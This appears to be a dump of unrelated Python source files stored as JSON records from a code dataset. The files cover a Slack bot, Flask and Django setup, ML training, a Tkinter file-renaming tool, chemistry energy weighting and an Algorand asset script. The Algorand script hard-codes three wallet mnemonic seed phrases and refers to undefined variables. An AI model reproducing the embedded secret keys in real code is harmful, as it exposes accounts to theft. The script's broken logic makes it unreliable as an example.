UserSlack.has_user_reported(event['user']) is False:\n self.post_message(event['user'], bot_messages.login_message)\n elif event_type == 'user_post_message':\n status, comments = UserStatusReport.get_status(event['text'])\n if status is not None:\n self.user_report_status(event['user'], status, comments)\n else:\n self.post_message(event['user'], text=bot_messages.help_message)\n time.sleep(0.5)\n except KeyboardInterrupt:\n logging.info('Disconnected. Bye bye Nemesis')\n break\n except Exception:\n logging.exception(\"message\")\n else:\n logging.error('Cannot connect to Nemesis bot. Is the token correct?')\n\n def get_event_type(self, event):\n if event['type'] == 'message':\n channel = self.get_channel_info(event['channel'])\n if channel['ok'] is False and event['user'] != self.bot_id:\n return 'user_post_message'\n if event['type'] == 'presence_change' and event['presence'] == 'active':\n return 'user_login'\n\n def user_report_status(self, user, status, comments=None):\n UserSlack.report_status(self.get_user_info(user), status, comments)\n self.post_message(user, text=bot_messages.success_message)\n","sub_path":"src/nemesis/bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"337817995","text":"# pylint: skip-file\nfrom flask import Flask\nfrom flask_mongoengine import MongoEngine\n\ndb = MongoEngine()\n\nfrom app.controllers import main\n\n\ndef create_app(object_name):\n \"\"\"\n An flask application factory, as explained here:\n http://flask.pocoo.org/docs/patterns/appfactories/\n\n Arguments:\n object_name: the python path of the config object,\n e.g. appname.settings.ProdConfig\n \"\"\"\n app = Flask(__name__)\n app.config.from_object(object_name)\n\n # Initialize the database\n db.init_app(app)\n\n # register our blueprints\n app.register_blueprint(main)\n\n return app\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"516309873","text":"#!/usr/bin/python\n\"\"\"\nNewTraceFac_test.py\nspecifically for v18py6.\n\"\"\"\n\nfrom NewTrace18py6 import NTRC, ntrace, ntracef\nfrom os import environ\n\n\n# Crack open the black box to replace the params\n# for testing.\ndef setNewDefaults(obj, mylevel=6, mytarget=0, myfile=\"\", myfacility=\"\", \n mytime=\"\", myhtml=\"\", myproduction=0):\n obj.setDefaults(level=mylevel, target=mytarget, file=myfile, \n facility=myfacility, time=mytime, html=myhtml, \n production=myproduction)\n print(\"\\nsetNewDef: level=|%d| target=|%d| file=|%s| facility=|%s| time=|%s| \"\n \"html=|%s| production|%s|\" \n % (mylevel, mytarget, myfile, myfacility, mytime, \n myhtml, myproduction))\n\n\n# A L L L E V E L S \ndef testAllLevels():\n print(\"\\n========== testAllLevels ============\\n\")\n NTRC.ntrace(0,\"test level 0\")\n NTRC.ntrace(1,\"test level 1\")\n NTRC.ntrace(2,\"test level 2\")\n NTRC.ntrace(3,\"test level 3\")\n NTRC.ntrace(4,\"test level 4\")\n NTRC.ntrace(5,\"test level 5\")\n\n\ndef testFacils():\n print(\"========== testFacils ============\")\n NTRC.ntrace(0,\"test level 0\")\n NTRC.ntrace(1,\"test level 1\")\n NTRC.ntracef(1,\"AAA\",\"facil AAA at test level 1\")\n NTRC.ntracef(1,\"BBB\",\"facil AAA at test level 1\")\n\n\ndef testOneLevel():\n print(\"============ testOneLevel =============\")\n NTRC.ntracef(0,\"A\",\"facil A at test level 0\")\n NTRC.ntracef(0,\"B\",\"facil B at test level 0\")\n NTRC.ntracef(0,\"C\",\"facil C at test level 0\")\n\n\n# M A J O R T E S T S \n\n# V A R I O U S L E V E L S \ndef testVariousLevels():\n print(\"\\n============ testVariousLevels =============\\n\")\n setNewDefaults(NTRC, mylevel=0, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=\"\", myhtml=\"\", myproduction=0)\n testAllLevels()\n \n setNewDefaults(NTRC, mylevel=1, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=\"\", myhtml=\"\", myproduction=0)\n testAllLevels()\n \n setNewDefaults(NTRC, mylevel=5, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=\"\", myhtml=\"\", myproduction=0)\n testAllLevels()\n\n\n# A L L F A C I L I T I E S \ndef testAllFacils():\n print(\"\\n============ testAllFacils =============\\n\")\n setNewDefaults(NTRC, mylevel=5, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=\"\", myhtml=\"\", myproduction=0)\n testFacils()\n\n lFacils = (\"'' ALL ALL-A ALL-AAA \"\n \"NONE NONE+A NONE+AAA GIGO \" \n \"all-aaa none+aaa\").split()\n for sFacil in lFacils:\n setNewDefaults(NTRC, mylevel=5, mytarget=0, myfile=\"\", \n myfacility=sFacil, mytime=\"\", myhtml=\"\", myproduction=0)\n testFacils()\n\n\n# A L L T A R G E T S \ndef testAllTargets():\n print(\"\\n============ testAllTargets =============\\n\")\n lTargets = [0,1,2,3,4,5,6,7]\n for iTarget in lTargets:\n setNewDefaults(NTRC, mylevel=5, mytarget=iTarget, \n myfile=\"test_NewTrace.log\", \n myfacility=\"\", mytime=\"\", myhtml=\"\", myproduction=0)\n testFacils()\n\n setNewDefaults(NTRC, mylevel=5, mytarget=0, \n myfile=\"test_NewTrace_shouldnotbehere.log\", \n myfacility=\"\", mytime=\"\", myhtml=\"\", myproduction=0)\n testOneLevel()\n\n\n# A L L H T M L S \ndef testAllHTMLs():\n print(\"\\n============ testAllHTMLs =============\\n\")\n lHtmlStrings = [\"\", 0, \"00\", \"|\", \"|\", \"\", \"|\", \"|\"]\n for sHtml in lHtmlStrings:\n setNewDefaults(NTRC, mylevel=5, mytarget=2, myfile=\"\", \n myfacility=\"\", mytime=\"\", myhtml=sHtml, myproduction=0)\n testFacils()\n \n\n# A L L T I M E S \ndef testAllTimes():\n print(\"\\n============ testAllTimes =============\\n\")\n lTimes = [0, \"\", \"00\", \"YES\", \"NO\"]\n for sTime in lTimes:\n setNewDefaults(NTRC, mylevel=5, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=sTime, myhtml=\"\", myproduction=0)\n testFacils()\n\n\n# D E C O R A T O R L E V E L S \ndef testAllDecoratorLevels():\n print(\"\\n========== testAllDecoratorLevels ============\\n\")\n @ntrace\n def testDecoPlain():\n return \"MePlain\"\n @ntracef(\"FANC\", level=4)\n def testDecoFancy1():\n return \"MeFancy1 elevated level\"\n @ntracef(\"\", level=4)\n def testDecoFancy2():\n return \"MeFancy2 elevated level no facility\"\n\n setNewDefaults(NTRC, mylevel=5, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=\"\", myhtml=\"\", myproduction=0)\n testDecoPlain()\n testDecoFancy1()\n testDecoFancy2()\n\n\n# E N T R Y P O I N T \nif 1:\n print (\"============= Begin =============\")\n setNewDefaults(NTRC, mylevel=0, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=\"YES\", myhtml=\"\", myproduction=0)\n NTRC.ntrace(0, \"BEGIN\")\n\n setNewDefaults(NTRC, mylevel=6, mytarget=0, myfile=\"\", \n myfacility=\"all-aaa\", mytime=\"\", myhtml=\"\", myproduction=0)\n testAllLevels()\n \n testVariousLevels()\n\n testAllFacils()\n\n testAllDecoratorLevels()\n\n testAllTargets()\n\n testAllHTMLs()\n \n testAllTimes()\n\n setNewDefaults(NTRC, mylevel=0, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=\"YES\", myhtml=\"\", myproduction=0)\n NTRC.ntrace(0, \"DONE!\")\n\n\n'''\nWhat I actually should be testing:\n\n- ntrace levels 0, 1, 5\n- target 0,1,2,4,5,6,7\n- file none, name.ext w target=4, name.ext w target=0\n- facil \"\",all,all-a,all-aaa,none,none+a,none+aaa,gigo\n- html \"\",|,|,,|,|\n- time 0,\"\",\"0\",\"YES\",\"NO\"\n- production \"\",YES,NO\n\n'''\n\n#END\n","sub_path":"test/NewTraceFac18py6_test.py","file_name":"NewTraceFac18py6_test.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"62349576","text":"from django.conf.urls import patterns, url, include\nfrom django.contrib import admin\nfrom django.contrib.auth.views import logout\nfrom django.views.generic import TemplateView\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', TemplateView.as_view(\n template_name=\"places/index.html\"), name='home'),\n url(r'^detail.html$', TemplateView.as_view(\n template_name=\"detail.html\"), name='home'),\n url(r'logout$', logout, {'next_page': \"/\"}, name='logout'),\n url(r'^places/', include('campgrounds.places.urls')),\n url(r'^wall/', include('campgrounds.wall.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'', include('social_auth.urls')),\n)\n","sub_path":"build/campgrounds/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"417348890","text":"import logging\nimport pickle\nfrom pathlib import Path\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom simpletransformers.classification import ClassificationModel, ClassificationArgs\n\n\ndef get_args():\n model_args = ClassificationArgs()\n model_args.labels_list = ['anger', 'anticipation', 'disgust', 'fear', 'joy', 'sadness', 'surprise', 'trust']\n model_args.cache_dir = 'cache/'\n model_args.output_dir = 'outputs'\n model_args.overwrite_output_dir = True\n model_args.n_gpu = 2\n model_args.learning_rate = 1e-5\n model_args.num_train_epochs = 10\n model_args.train_batch_size = 128\n model_args.eval_batch_size = 128\n\n return model_args\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n transformers_logger = logging.getLogger(\"transformers\")\n transformers_logger.setLevel(logging.ERROR)\n\n dataset_dir = 'dm2020-hw2-nthu'\n dataset_path = Path(dataset_dir)\n train_df = pickle.load(open(dataset_path/'train.pkl', 'rb'))\n test_df = pickle.load(open(dataset_path/'test.pkl', 'rb'))\n\n x_train, x_val, y_train, y_val = train_test_split(\n train_df['text'].values, train_df['emotion'].values, test_size=0.2, shuffle=True, random_state=55688)\n\n train_data = pd.DataFrame({'id': x_train, 'label': y_train})\n val_data = pd.DataFrame({'id': x_val, 'label': y_val})\n\n model = ClassificationModel('roberta', 'roberta-base', args=get_args(), num_labels=8)\n\n # Train the model\n model.train_model(train_data)\n\n # Evaluate the model\n result, model_outputs, wrong_predictions = model.eval_model(val_data)\n\n predictions, _ = model.predict(test_df['text'].values)\n\n submission_df = pd.DataFrame({'id': test_df['tweet_id'].values, 'emotion': predictions})\n submission_df.to_csv('submission.csv', index=False)\n","sub_path":"bert_simple.py","file_name":"bert_simple.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"225310437","text":"__author__ = 'adamidesa', 'websterj2'\r\n\r\nimport os\r\nfrom datetime import datetime, timedelta\r\nfrom Tkinter import *\r\n\r\n# GUI\r\nclass App:\r\n def __init__(self, master):\r\n\r\n frame = Frame(master)\r\n frame.grid()\r\n\r\n # create path label\r\n self.label2 = Label(\r\n frame, text=\"Enter release folder path: \"\r\n )\r\n self.label2.grid(row=0, column=0, columnspan=4, pady=2)\r\n\r\n # create text entry widget\r\n self.entry2 = Entry(\r\n frame, width=40\r\n )\r\n self.entry2.focus\r\n self.entry2.grid(row=1, column=0, columnspan=4, pady=2)\r\n\r\n # create label\r\n self.label = Label(\r\n frame, text=\"No. of scripts to create: \"\r\n )\r\n self.label.grid(row=3, column=1, columnspan=1, pady=4)\r\n\r\n # create text entry widget\r\n self.entry = Entry(\r\n frame, width=3\r\n )\r\n self.entry.focus\r\n self.entry.grid(row=3, column=2, columnspan=1)\r\n\r\n # create generate button\r\n self.genbutton = Button(\r\n frame, text=\"Generate Structure\", fg=\"black\", height=1, width=34, command=self.on_sgen\r\n )\r\n self.genbutton.grid(row=4, column=0, columnspan=4)\r\n\r\n # create prepare button\r\n self.prepbutton = Button(\r\n frame, text=\"Prepare Timestamps\", fg=\"black\", height=1, width=34, command=self.on_prep\r\n )\r\n self.prepbutton.grid(row=2, column=0, columnspan=4)\r\n\r\n # create add v's button\r\n self.addbutton = Button(\r\n frame, text=\"Add Vs\", fg=\"black\", height=1, width=34, command=self.on_addv\r\n )\r\n self.addbutton.grid(row=5, column=0, columnspan=4)\r\n\r\n # create rem v's button\r\n self.rembutton = Button(\r\n frame, text=\"Remove Vs\", fg=\"black\", height=1, width=34, command=self.on_remv\r\n )\r\n self.rembutton.grid(row=6, column=0, columnspan=4)\r\n\r\n def on_sgen(self):\r\n global text\r\n text = self.entry.get()\r\n\r\n # cast input text to int\r\n try:\r\n text = int(text)\r\n except ValueError:\r\n text = 0\r\n\r\n # generate release structure\r\n self.generate()\r\n\r\n def on_addv(self):\r\n\r\n os.chdir(\"Releases\")\r\n for f in os.listdir(os.getcwd()):\r\n # acquire file name\r\n filename = f\r\n p = re.compile('\\d*_{2}.*')\r\n\r\n # if match then rename\r\n if p.match(filename) is not None:\r\n # concact V prefix\r\n newname = \"V\" + filename\r\n # rename file\r\n os.rename(f, newname)\r\n\r\n os.chdir(\"..\")\r\n\r\n def on_remv(self):\r\n\r\n os.chdir(\"Releases\")\r\n for f in os.listdir(os.getcwd()):\r\n # acquire file name\r\n filename = f\r\n\r\n # set regex\r\n p = re.compile('V{1}\\d+.*')\r\n\r\n if p.match(filename) is not None:\r\n # remove first character of filename - needs further validation\r\n newname = f[1:]\r\n # rename file\r\n os.rename(f, newname)\r\n\r\n os.chdir(\"..\")\r\n\r\n def on_prep(self):\r\n\r\n #global rpath\r\n rpath = self.entry2.get()\r\n\r\n releasesfolder = \"Releases\"\r\n rollbackfolder = \"Rollback\"\r\n\r\n now = datetime.now()\r\n year = now.year\r\n month = now.month\r\n day = now.day\r\n hour = now.hour\r\n minute = now.minute\r\n\r\n timestamp = now\r\n\r\n # rpath debug\r\n #print \"Release path is: \", rpath\r\n\r\n # Change to Releases directory\r\n os.chdir(rpath)\r\n\r\n # debug rpath chdir\r\n #print \"Entered release path: \", os.getcwd()\r\n\r\n os.chdir(releasesfolder)\r\n listdir = os.listdir(os.getcwd())\r\n\r\n # File dir loop\r\n for f in listdir:\r\n\r\n #print \"File: \" + f\r\n # Extract remaining filename\r\n if re.search('_{2}.*', f) is not None:\r\n # print \"Double underscore detected, firing first loop\"\r\n\r\n # print re.search('_{2}.*', f)\r\n ext_fn = re.search('_{2}.*', f).group(0)\r\n # Add minute increment to timestamp\r\n timestamp += timedelta(minutes=1)\r\n # print \"Timestamp: \", timestamp\r\n # Create new timestamp string\r\n timestring = str('{:%Y%m%d%H%M}'.format(timestamp))\r\n # print timestring\r\n # Rename file\r\n os.rename(f, \"V\" + timestring + ext_fn)\r\n\r\n else:\r\n\r\n prefix = re.search('\\d+_', f).group(0)\r\n # print \"Prefix: \", prefix\r\n\r\n prefix_len = len(prefix)\r\n # print \"Prefix len: \", prefix_len\r\n\r\n filename = f\r\n # Add minute increment to timestamp\r\n timestamp += timedelta(minutes=1)\r\n # print \"Timestamp: \", timestamp\r\n # Create new timestamp string\r\n timestring = str('{:%Y%m%d%H%M}'.format(timestamp))\r\n # print timestring\r\n # Rename file\r\n os.rename(f, \"V\" + timestring + \"__\" + filename[prefix_len:])\r\n\r\n os.chdir(\"..\")\r\n\r\n # Change to Rollback directory\r\n os.chdir(rollbackfolder)\r\n listdir = os.listdir(os.getcwd())\r\n\r\n for f in listdir:\r\n\r\n # print \"File: \" + f\r\n # Extract remaining filename\r\n if re.search('_{2}.*', f) is not None:\r\n # print \"Run code\"\r\n\r\n # print re.search('_{2}.*', f)\r\n ext_fn = re.search('_{2}.*', f).group(0)\r\n # Add minute increment to timestamp\r\n timestamp += timedelta(minutes=1)\r\n # print \"Timestamp: \", timestamp\r\n # Create new timestamp string\r\n timestring = str('{:%Y%m%d%H%M}'.format(timestamp))\r\n # print timestring\r\n # Rename file\r\n os.rename(f, timestring + ext_fn)\r\n\r\n else:\r\n\r\n prefix = re.search('\\d+_', f).group(0)\r\n # print \"Prefix: \", prefix\r\n\r\n prefix_len = len(prefix)\r\n # print \"Prefix len: \", prefix_len\r\n\r\n filename = f\r\n # Add minute increment to timestamp\r\n timestamp += timedelta(minutes=1)\r\n # print \"Timestamp: \", timestamp\r\n # Create new timestamp string\r\n timestring = str('{:%Y%m%d%H%M}'.format(timestamp))\r\n # print timestring\r\n # Rename file\r\n os.rename(f, timestring + \"__\" + filename[prefix_len:])\r\n\r\n os.chdir(\"..\")\r\n\r\n def generate(self):\r\n\r\n rpath = self.entry2.get()\r\n\r\n now = datetime.now()\r\n\r\n timestamp = now\r\n\r\n # Change to Releases directory\r\n os.chdir(rpath)\r\n\r\n releasesfolder = \"Releases\"\r\n docsfolder = \"Docs\"\r\n rollbackfolder = \"Rollback\"\r\n\r\n # Parse release name\r\n releasename = re.search('(CHG.*.)', (os.getcwd())).group(0)\r\n\r\n\r\n # Construct basefilename\r\n basefilename = \"\"\r\n i = 0\r\n for entry in releasename.split(\"_\"):\r\n if (i == 0) or (i == 2) or (i == 3):\r\n i += 1\r\n else:\r\n basefilename = basefilename.__add__(entry + \"_\")\r\n i += 1\r\n\r\n # Create dirs\r\n os.makedirs(releasesfolder)\r\n os.makedirs(docsfolder)\r\n os.makedirs(rollbackfolder)\r\n\r\n # Generate n release files\r\n for i in range(1, text + 1):\r\n\r\n # Add minute increment to timestamp\r\n timestamp += timedelta(minutes=1)\r\n # print \"Timestamp: \", timestamp\r\n\r\n # Create new timestamp string\r\n timestring = str('{:%Y%m%d%H%M}'.format(timestamp))\r\n\r\n release1 = \"V\" + timestring + \"__\" + basefilename + \"_action_schema_table_tbl\" + \".sql\"\r\n file(releasesfolder + \"/\" + release1, \"w\")\r\n\r\n # Generate rollback file\r\n timestamp += timedelta(minutes=1)\r\n timestring = str('{:%Y%m%d%H%M}'.format(timestamp))\r\n rollbackfile = timestring + \"__\" + basefilename + \"Rollback\" + \".sql\"\r\n file(rollbackfolder + \"/\" + rollbackfile, \"w\")\r\n\r\n# Create tk frame\r\nroot = Tk()\r\n\r\n# Frame options\r\nroot.wm_title(\"\")\r\nroot.resizable(width=FALSE, height=FALSE)\r\n# root.geometry(\"300x300\")\r\n\r\napp = App(root)\r\nroot.mainloop()\r\n\r\n# root.destroy()\r\n","sub_path":"aliens/PythonProjects/RedshiftDeployment/release_prep_util.pyw","file_name":"release_prep_util.pyw","file_ext":"pyw","file_size_in_byte":8567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"445717008","text":"import sys\r\nimport os\r\nimport numpy as np\r\nimport math\r\n\r\ndirectory = r'G:\\Hopkins_Laboratory\\Pesticide_AcE_Inhibitor\\Structures\\Protonated\\DFT_and_MobCal\\8\\Outputs'\r\n\r\n#constants\r\nR = 8.3144598E-3 # kJ mol^-1\r\nT = 298.15 #kelvin\r\n\r\n#csv containing filenames and HF energies (unscaled)\r\nopf = open(directory+'\\\\Gibbs.csv', 'r')\r\ndata = opf.readlines()\r\nopf.close()\r\n\r\n#do not edit past this point\r\n#curent name\r\ncn = ''\r\nmn = [] #master name array\r\nme = [] #master energy array\r\ntn = [] #temp name array\r\nte = [] #temp energy array\r\n\r\nfor line in data[1:]:\r\n line = line.split(',')\r\n name = line[0]\r\n energy = float(line[1].strip())\r\n prefix = name[:name.rfind('_')]\r\n if prefix != cn: #group isomers by chemical name found in input filename\r\n mn.append(tn)\r\n me.append(te)\r\n tn = []\r\n te = []\r\n cn = prefix\r\n tn.append(name)\r\n te.append(energy)\r\n\r\n#remove blank initial value in mn and me arrays\r\nmn = mn[1:]\r\nme = me[1:]\r\n\r\nme2 = []\r\nweight = []\r\n\r\nfor nrg in me:\r\n #get min energy\r\n min_e = min(nrg)\r\n rel_e = (np.array(nrg)-min_e)*2625.5\r\n #boltzmann weighting\r\n b = np.exp((-rel_e)/(R*T))\r\n pop = sum(b)\r\n w = b/pop\r\n me2.append(rel_e.tolist())\r\n weight.append(w.tolist())\r\n\r\n#write filename, energy, relative energy, and botlzmann weight to file\r\nopf = open(directory+'\\\\Rel_E.csv', 'w')\r\nopf.write('Name,Energy,Relative E,Boltzmann Weight\\n')\r\nfor i in range(len(mn)):\r\n for a in range(len(mn[i])):\r\n opf.write(mn[i][a]+','+str(me[i][a])+','+str(me2[i][a])+','+str(weight[i][a])+'\\n')\r\n\r\nopf.close()\r\n","sub_path":"Energy_Weighter/Energy_weighter.py","file_name":"Energy_weighter.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"280559588","text":"import numpy as np \r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt \r\nfrom sklearn.linear_model import LinearRegression\r\n\r\ndataset = pd.read_csv(\"Position_Salaries.csv\")\r\nfeatures=dataset.iloc[:,1:-1].values\r\nlabels=dataset.iloc[:,-1].values\r\n\r\nplt.scatter(features, labels)\r\nplt.show()\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_object =PolynomialFeatures(degree = 6)\r\nfeatures_poly = poly_object.fit_transform(features)\r\n\r\nlin_reg = LinearRegression()\r\nlin_reg.fit(features_poly,labels)\r\n\r\nlin_reg.predict(poly_object.transform([[6]]))\r\n\r\n#Visaulize the polynomial set \r\n#features_grid=np.arange(min(features),max(features),0.01)\r\n#features_grid=features_grid.reshape(len(features_grid),1)\r\nplt.scatter(features,labels,color='red')\r\nplt.plot(features,lin_reg.predict(poly_object.fit_transform(features)),color='blue')\r\nplt.title('PLR')\r\nplt.xlabel('Year')\r\nplt.ylabel(\"Cost\")\r\nplt.show()\r\n\r\np=lin_reg.predict(poly_object.transform([[7.8]]))\r\n","sub_path":"Position_Salaries.py","file_name":"Position_Salaries.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"370865355","text":"########## IMPORT PACKAGES ##########\nimport json\nfrom algosdk.v2client import algod\nfrom algosdk import account, mnemonic\nfrom algosdk.future.transaction import AssetConfigTxn, AssetTransferTxn, AssetFreezeTxn\n\n########## HELPER FUNCTIONS ##########\ndef wait_for_confirmation(client, txid):\n \"\"\"\n Utility function to wait until the transaction is\n confirmed before proceeding.\n \"\"\"\n last_round = client.status().get('last-round')\n txinfo = client.pending_transaction_info(txid)\n while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0):\n print(\"Waiting for confirmation\")\n last_round += 1\n client.status_after_block(last_round)\n txinfo = client.pending_transaction_info(txid)\n print(\"Transaction {} confirmed in round {}.\".format(txid, txinfo.get('confirmed-round')))\n return txinfo\n\n# Utility function used to print created asset for account and assetid\ndef print_created_asset(algodclient, account, assetid): \n # note: if you have an indexer instance available it is easier to just use this\n # response = myindexer.accounts(asset_id = assetid)\n # then use 'account_info['created-assets'][0] to get info on the created asset\n account_info = algodclient.account_info(account)\n idx = 0;\n for my_account_info in account_info['created-assets']:\n scrutinized_asset = account_info['created-assets'][idx]\n idx = idx + 1 \n if (scrutinized_asset['index'] == assetid):\n print(\"Asset ID: {}\".format(scrutinized_asset['index']))\n print(json.dumps(my_account_info['Sparams'], indent=4))\n break\n return\n\n# Utility function used to print asset holding for account and assetid\ndef print_asset_holding(algodclient, account, assetid):\n # note: if you have an indexer instance available it is easier to just use this\n # response = myindexer.accounts(asset_id = assetid)\n # then loop thru the accounts returned and match the account you are looking for\n account_info = algodclient.account_info(account)\n idx = 0\n for my_account_info in account_info['assets']:\n scrutinized_asset = account_info['assets'][idx]\n idx = idx + 1 \n if (scrutinized_asset['asset-id'] == assetid):\n print(\"Asset ID: {}\".format(scrutinized_asset['asset-id']))\n print(json.dumps(scrutinized_asset, indent=4))\n break\n return\n\n\n########## SWITCHES ##########\n\n# TODO: change keys into JSON requests\ndef txn_switch(txn_type): # param should be string\n txn = none\n if txn_type == 'create':\n txn = createDocument()\n elif txn_type == 'verify':\n txn = verifyDocument()\n elif txn_type == 'revoke':\n txn = revokeDocument()\n return txn\n\ndef printInformation(txn_type):\n try:\n # Pull account info for the creator\n # account_info = algod_client.account_info(accounts[1]['pk'])\n # get asset_id from tx\n # Get the new asset's information from the creator account\n ptx = algod_client.pending_transaction_info(txid)\n asset_id = ptx[\"asset-index\"]\n if txn_type == 'create':\n print_created_asset(algod_client, accounts[1]['pk'], asset_id)\n print_asset_holding(algod_client, accounts[1]['pk'], asset_id)\n elif txn_type == 'verify':\n print(\"print what?\")\n except Exception as e:\n print(e)\n return\n\n\n########## SUBROUTINES ##########\n\ndef createDocument(pk, html_file, doc_id, doc_name):\n wrapDocument(html_file)\n txn = AssetConfigTxn(\n sender = pk,\n sp = params,\n total = 1,\n default_frozen = False,\n unit_name = doc_id,\n asset_name = doc_name,\n manager = pk,\n reserve = pk,\n freeze = pk,\n clawback = pk,\n url = html_file,\n decimals = 0 )\n return txn\n\n\n\n\n# ----------------------- TEST ------------------------ #\n\nAlice = \"empower ill risk neglect manual piece kid hover goddess already casino labor crucial couch credit disorder below tennis magic whip away potato betray absorb reduce\"\nBob = \"require solution security ahead use jelly opera vessel absurd suit grape fork mix tattoo laundry chimney rebel example black swarm trim rib judge abandon nature\"\nCharlie = \"purse traffic harbor almost shine artist keen wrist crime diesel afford bus impact eagle winner once unfold uphold foster relax order nerve glove able disease\"\n\naccounts = {}\ncounter = 1\nfor m in [mnemonic1, mnemonic2, mnemonic3]:\n accounts[counter] = {}\n accounts[counter]['pk'] = mnemonic.to_public_key(m)\n accounts[counter]['sk'] = mnemonic.to_private_key(m)\n counter += 1\n\n# ----------------------------------------------------- #\n\n\n########## MAIN FUNCTION ##########\n\n# Specify your node address and token. This must be updated.\n\nalgod_address = \"http://localhost:4001\"\nalgod_token = \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\n\n# Initialize an algod client\nalgod_client = algod.AlgodClient(algod_token=algod_token, algod_address=algod_address)\n\n# Get network params for transactions before every transaction.\nparams = algod_client.suggested_params()\n\ntxn = txn_switch(txn_type) #from userinput\n\n# Sign with secret key of transaction creator\nstxn = txn.sign(sk)\n\n# Send the transaction to the network and retrieve the txid.\ntxid = algod_client.send_transaction(stxn)\nprint(txid)\n\n\n# Wait for the transaction to be confirmed\nwait_for_confirmation(algod_client,txid)\n\n# Retrieve the asset ID of the newly created asset by first\n# ensuring that the creation transaction was confirmed,\n# then grabbing the asset id from the transaction.\nprintInformation(txn_type) # from user input\n","sub_path":"Verifiable_Document/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"148892519","text":"from source.module import Module\nfrom pathlib import Path\nimport os\nfrom .panel_finder.panel_finder import PanelFinder\nimport time\n\n\nclass PanelPredictor(Module):\n def __init__(self, parent=None, state=None):\n self.working_dir = Path(os.path.dirname(os.path.abspath(__file__)))\n super().__init__(self.working_dir, parent=parent, state=state)\n self.panel = None\n self.panel_finder = PanelFinder(self, state=state) # this panel finder needs no additional properties\n self.past_targets = []\n\n def process(self, frame):\n \"\"\"\n predicts where the center of the panel will be\n :param frame: an image that may contain a robot\n :return: ((x,y), confidence) coordinates of panel and confidence it will be there\n \"\"\"\n panel = self.panel_finder.process(frame)\n if panel is not None:\n panel, confidence = panel\n if len(self.past_targets) == self.properties[\"reference_frames\"]:\n self.past_targets.pop(0)\n self.past_targets.append((panel[\"x_center\"], panel[\"y_center\"], time.time(), confidence))\n if len(self.past_targets) == self.properties[\"reference_frames\"]:\n if self.properties[\"prediction_type\"] == \"linear\":\n return self.linear_prediction(frame)\n \n\n def linear_prediction(self, frame):\n frame_size = ((frame.shape[0]) ** 2 + (frame.shape[1]) ** 2) ** (1 / 2)\n distance = 1 / max(1e-3, frame.shape[1] / self.properties[\"distance_1m_height_rel\"] / 1080)\n velocity, distance_confidence = self.average_velocity(frame_size)\n foresight_time = time.time() - self.past_targets[-1][2] + self.properties[\"seconds_ahead\"]\n target = (round(self.past_targets[-1][0] + velocity[0] * foresight_time),\n round(self.past_targets[-1][1] + velocity[1] * foresight_time))\n foresight_confidence = (1 / (foresight_time * self.properties[\"time_confidence_falloff\"] + 1))\n cumulative_confidence = distance_confidence * foresight_confidence\n return target, distance, cumulative_confidence\n\n def average_velocity(self, max_distance):\n avg_velocity = [0, 0]\n error = 1\n data_points = (len(self.past_targets) - 1)\n for i in range(len(self.past_targets) - 1):\n pointA = self.past_targets[i]\n pointB = self.past_targets[i + 1]\n deltaX = pointB[0] - pointA[0]\n deltaY = pointB[1] - pointA[1]\n deltaT = pointB[2] - pointA[2]\n distance = (deltaX ** 2 + deltaY ** 2) ** (1 / 2) / max_distance\n avg_velocity[0] += deltaX / deltaT / data_points\n avg_velocity[1] += deltaY / deltaT / data_points\n distance_error = distance ** 2 / data_points * self.properties[\"distance_confidence_falloff\"]\n confidence = 1 / ((pointA[3] + pointB[3]) / 2)\n error += distance_error * confidence ** self.properties[\"model_confidence_weight\"]\n return avg_velocity, 1 / error\n","sub_path":"source/panel_predictor/panel_predictor.py","file_name":"panel_predictor.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
